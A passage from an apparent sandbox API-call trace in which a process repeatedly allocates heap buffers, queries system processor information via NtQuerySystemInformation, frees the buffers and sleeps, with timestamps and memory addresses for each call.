hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0248.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0248.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0248.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0248.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0248.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.145] Sleep (dwMilliseconds=0x110) [0248.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0248.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0248.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0248.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0248.164] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0248.164] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.165] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0248.165] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0248.165] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.166] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0248.166] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.167] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.167] Sleep (dwMilliseconds=0x110) [0248.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0248.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0248.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0248.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0248.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0248.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0248.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0248.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0248.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.177] Sleep (dwMilliseconds=0x110) [0248.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0248.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0248.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0248.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0248.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0248.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0248.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0248.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0248.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.193] Sleep (dwMilliseconds=0x110) [0248.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0248.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0248.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0248.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0248.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0248.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0248.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0248.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0248.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.206] Sleep (dwMilliseconds=0x110) [0248.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0248.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0248.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0248.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0248.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0248.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0248.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0248.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0248.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.223] Sleep (dwMilliseconds=0x110) [0248.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0248.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0248.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0248.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0248.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0248.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0248.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0248.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0248.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.239] Sleep (dwMilliseconds=0x110) [0248.272] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0248.272] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.273] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0248.274] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0248.274] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.274] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0248.274] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0248.274] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.275] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0248.275] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0248.275] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.276] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0248.276] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.276] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.276] Sleep (dwMilliseconds=0x110) [0248.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0248.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0248.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0248.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0248.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0248.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0248.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0248.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0248.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.286] Sleep (dwMilliseconds=0x110) [0248.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0248.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0248.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0248.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0248.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0248.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0248.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0248.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0248.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.301] Sleep (dwMilliseconds=0x110) [0248.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0248.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0248.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0248.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0248.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0248.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0248.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0248.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0248.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.313] Sleep (dwMilliseconds=0x110) [0248.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0248.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0248.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0248.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0248.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0248.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0248.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0248.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0248.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.328] Sleep (dwMilliseconds=0x110) [0248.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0248.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0248.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0248.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0248.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0248.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0248.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0248.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0248.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.345] Sleep (dwMilliseconds=0x110) [0248.402] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0248.402] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.403] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0248.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0248.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0248.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0248.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0248.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0248.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0248.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.408] Sleep (dwMilliseconds=0x110) [0248.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0248.431] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.431] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0248.431] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0248.431] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, 